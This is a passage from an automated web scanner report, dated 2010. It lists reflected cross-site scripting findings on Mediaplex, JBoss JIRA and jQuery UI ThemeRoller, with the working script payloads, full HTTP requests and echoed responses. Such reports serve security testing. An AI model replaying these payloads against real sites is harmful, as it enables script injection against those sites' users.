The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e733"%3balert(1)//2ab4c249393 was submitted in the mpvc parameter. This input was echoed as 5e733";alert(1)//2ab4c249393 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/11921/102238/circa_300x250Revised.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F11921-102238-1358-0%3Fmpt%3D2010.11.15.07.15.41&mpt=2010.11.15.07.15.41&mpvc=5e733"%3balert(1)//2ab4c249393 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Cookie: svid=804356890302; mojo3=11921:1358/11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:20:31 GMT
Server: Apache
Last-Modified: Thu, 24 Jun 2010 14:58:41 GMT
ETag: "428a17-b94-489c7e3d92a40"
Accept-Ranges: bytes
Content-Length: 4177
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=5e733";alert(1)//2ab4c249393http://altfarm.mediaplex.com%2Fad%2Fck%2F11921-102238-1358-0%3Fmpt%3D2010.11.15.07.15.41&clickTag=5e733";alert(1)//2ab4c249393http://altfarm.mediaplex.com%2Fad%2Fck%2F11921-102238-1358-0%3Fmpt%3D2010.1
...[SNIP]...

4.118. https://jira.jboss.org/rest/activity-stream/1.0/url [keys parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://jira.jboss.org
Path:   /rest/activity-stream/1.0/url

Issue detail

The value of the keys request parameter is copied into the HTML document as plain text between tags. The payload 1f82f<script>alert(1)</script>d55a495333 was submitted in the keys parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rest/activity-stream/1.0/url?keys=SEAMJMS1f82f<script>alert(1)</script>d55a495333&numofentries=10&username= HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: https://jira.jboss.org/plugins/servlet/gadgets/ifr?container=atlassian&mid=stream&country=US&lang=en&view=default&view-params=%7B%22writable%22%3A%22false%22%7D&st=atlassian%3A%2F1aWbDB6TX%2BAyrGE%2B%2BhAaq4GCFKtIbqfC9Lbx8jnWsqDclsCv3HpHfC8%2BOvPR6Wb2fOB30d3qlAV0iECalh0Hne1yg3Yln%2BdK0M6ZFuzhISnCoL4zkLEg7T1Y%2B5QM%2FOAAIPLRSCWMk0EmhIKm6w2BEONzbVtWK81waFH0PlAKo6ZgzkM5KvX9SVZerROYub%2BNgPfYikgbV1hErZhfNOEpVI3dkqZpkkGd%2FbvjZZISS3R%2BshTgtFbc9O5kn7YhHTr5YDQTg%3D%3D&up_isConfigured=true&up_isConfigurable=false&up_refresh=false&up_title=&up_titleRequired=false&up_keys=SEAMJMS&up_itemKeys=&up_username=&up_numofentries=10&url=https%3A%2F%2Fjira.jboss.org%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.streams.streams-jira-plugin%2Fgadgets%2Factivitystream-gadget.xml&libs=auth-refresh
Accept: application/json, text/javascript, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jira.jboss.org
Connection: Keep-Alive
Cookie: JSESSIONID=054235C303669934768F68853A63ADCC

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:00:53 GMT
Server: Apache-Coyote/1.1
X-AREQUESTID: 540x976473x15
X-ASESSIONID: 3jsbox
X-AUSERNAME: anonymous
Cache-Control: no-cache, no-store, no-transform
Content-Type: application/json;charset=UTF-8
Content-Length: 86
Connection: close

{"url":"/plugins/servlet/streams?key=SEAMJMS1f82f<script>alert(1)</script>d55a495333"}

4.119. https://jira.jboss.org/rest/activity-stream/1.0/url [username parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://jira.jboss.org
Path:   /rest/activity-stream/1.0/url

Issue detail

The value of the username request parameter is copied into the HTML document as plain text between tags. The payload 1bcd4<script>alert(1)</script>d253e6aeae3 was submitted in the username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rest/activity-stream/1.0/url?keys=SEAMJMS&numofentries=10&username=1bcd4<script>alert(1)</script>d253e6aeae3 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: https://jira.jboss.org/plugins/servlet/gadgets/ifr?container=atlassian&mid=stream&country=US&lang=en&view=default&view-params=%7B%22writable%22%3A%22false%22%7D&st=atlassian%3A%2F1aWbDB6TX%2BAyrGE%2B%2BhAaq4GCFKtIbqfC9Lbx8jnWsqDclsCv3HpHfC8%2BOvPR6Wb2fOB30d3qlAV0iECalh0Hne1yg3Yln%2BdK0M6ZFuzhISnCoL4zkLEg7T1Y%2B5QM%2FOAAIPLRSCWMk0EmhIKm6w2BEONzbVtWK81waFH0PlAKo6ZgzkM5KvX9SVZerROYub%2BNgPfYikgbV1hErZhfNOEpVI3dkqZpkkGd%2FbvjZZISS3R%2BshTgtFbc9O5kn7YhHTr5YDQTg%3D%3D&up_isConfigured=true&up_isConfigurable=false&up_refresh=false&up_title=&up_titleRequired=false&up_keys=SEAMJMS&up_itemKeys=&up_username=&up_numofentries=10&url=https%3A%2F%2Fjira.jboss.org%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.streams.streams-jira-plugin%2Fgadgets%2Factivitystream-gadget.xml&libs=auth-refresh
Accept: application/json, text/javascript, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jira.jboss.org
Connection: Keep-Alive
Cookie: JSESSIONID=054235C303669934768F68853A63ADCC

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:00:54 GMT
Server: Apache-Coyote/1.1
X-AREQUESTID: 540x976506x27
X-ASESSIONID: 3jsbox
X-AUSERNAME: anonymous
Cache-Control: no-cache, no-store, no-transform
Content-Type: application/json;charset=UTF-8
Content-Length: 99
Connection: close

{"url":"/plugins/servlet/streams?filterUser=1bcd4<script>alert(1)</script>d253e6aeae3&key=SEAMJMS"}

4.120. https://jira.jboss.org/secure/QuickSearch.jspa [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://jira.jboss.org
Path:   /secure/QuickSearch.jspa

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaffd"><script>alert(1)</script>539f0945265 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /secureaaffd"><script>alert(1)</script>539f0945265/QuickSearch.jspa HTTP/1.1
Host: jira.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=054235C303669934768F68853A63ADCC;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:30:44 GMT
Server: Apache-Coyote/1.1
X-AREQUESTID: 570x995774x1
X-ASESSIONID: 3jsbox
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-AUSERNAME: anonymous
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 124457


<html>
<head>
<content tag="section">find_link</content>
   <title>Issue Navigator</title>

<link rel="alternate" title="" href="/secure/IssueNavigator.jspa?view=rss&&amp;jqlQuery=p
...[SNIP]...
<th class="colHeaderLink sortable headerrow-issuetype" rel="issuetype:DESC" onClick="window.document.location='/secureaaffd"><script>alert(1)</script>539f0945265/IssueNavigator.jspa?sorter/field=issuetype&sorter/order=DESC'"


>
...[SNIP]...

4.121. http://jqueryui.com/themeroller/ [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63c21"><script>alert(1)</script>e0a91ab37f6 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff63c21"><script>alert(1)</script>e0a91ab37f6&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff63c21"><script>alert(1)</script>e0a91ab37f6&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighligh
...[SNIP]...

4.122. http://jqueryui.com/themeroller/ [bgColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1123d"><script>alert(1)</script>9442397b621 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee1123d"><script>alert(1)</script>9442397b621&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee1123d"><script>alert(1)</script>9442397b621&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefaul
...[SNIP]...

4.123. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ede7"><script>alert(1)</script>8a535ef4e7f was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f63ede7"><script>alert(1)</script>8a535ef4e7f&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f63ede7"><script>alert(1)</script>8a535ef4e7f&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderCol
...[SNIP]...

4.124. http://jqueryui.com/themeroller/ [bgColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af686"><script>alert(1)</script>36e7921bdd9 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900af686"><script>alert(1)</script>36e7921bdd9&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900af686"><script>alert(1)</script>36e7921bdd9&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverla
...[SNIP]...

4.125. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42612"><script>alert(1)</script>8e5b70fa715 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a82842612"><script>alert(1)</script>8e5b70fa715&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
heet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a82842612"><script>alert(1)</script>8e5b70fa715&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent
...[SNIP]...

4.126. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7e59"><script>alert(1)</script>5ae29252980 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45ca7e59"><script>alert(1)</script>5ae29252980&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45ca7e59"><script>alert(1)</script>5ae29252980&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgI
...[SNIP]...

4.127. http://jqueryui.com/themeroller/ [bgColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57ce5"><script>alert(1)</script>6c8eb05e3fb was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

